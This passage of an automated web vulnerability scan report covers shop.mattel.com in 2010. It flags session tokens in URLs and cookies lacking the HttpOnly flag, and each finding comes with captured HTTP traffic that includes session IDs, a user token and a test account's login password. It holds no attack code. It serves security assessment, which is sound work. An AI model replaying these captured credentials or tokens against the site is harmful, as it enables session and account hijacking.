HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:20 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40269


                                                                                                                                                                                                                        <!D
...[SNIP]...

3.5. http://shop.mattel.com/home/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:35 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45303


                                                                                                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0
...[SNIP]...

3.6. http://shop.mattel.com/product/index.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /product/index.jsp?productId=4199678 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:23:19 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54256


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<div id="langToggle">&#91;
<a href="/home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US">En espa.ol</a>
...[SNIP]...
</div>
<a href="/home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825" id="header-logo">Mattel Shop</a>
...[SNIP]...
<li><a href="/category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3719987" >Shop By Category</a>
...[SNIP]...
<li><a href="/category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741284" rel="redir:p+cp=3719987">Dolls & Accessories</a>
...[SNIP]...
<li><a href="/family/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741278" rel="redir:p+cp=3719987.3741284">Fashion Dolls</a>
...[SNIP]...
<div id="assistance">    
           For assistance 24/7 <a href="/helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&amp;subdisplay=contact" title="Contact Us">Contact us via email</a>
...[SNIP]...
<li><a href="/helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&amp;subdisplay=contact&amp;stillHaveQuestion=yes" title="Contact Us">Contact Us</a>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 27 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://shop.mattel.com/product/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /product/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/index.jsp?productId=4199678 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:09:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:23:19 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54256


    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...

4.2. https://shop.mattel.com/affiliate/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliate/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:16 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=bGkwNSJQK1gxnpPZcfpDGyz9DBWqmgjmKFr3FtyLQYQJNGQ2yfF2!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38474


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

4.3. https://shop.mattel.com/brand/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /brand/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vXThNSJGvphcGlG0d0LJVTlQkpRwpfvpyMkBCbTY3tRF30zxYTN0!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36834


                                                                                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...

4.4. https://shop.mattel.com/cart/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/cart/index.jsp
Set-Cookie: JSESSIONID=TG2TNSJLw8tNpQytl4Ltw1WL82GGTGkRD2vPLnj1GMtCSh4GnV1t!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/cart/index.
...[SNIP]...

4.5. https://shop.mattel.com/coreg/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /coreg/index.jsp HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Origin: https://shop.mattel.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}
Content-Length: 61

step=login&email=test%40fastdial.net&password=SkipIt1&x=0&y=0

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:11:07 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 315

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

4.6. https://shop.mattel.com/coreg/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=logout HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:36 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://shop.mattel.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 305

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

4.7. https://shop.mattel.com/emailSignup/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /emailSignup/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51584


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...

4.8. https://shop.mattel.com/giftCertificates/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /giftCertificates/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:41 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=mw1vNSJNFCyh5FlZyvhHzyRGSJT5vYGh8sMKRw1FzyHQMrSMrqBQ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 44100


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   
...[SNIP]...

4.9. https://shop.mattel.com/product/wishlist/wishlist.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
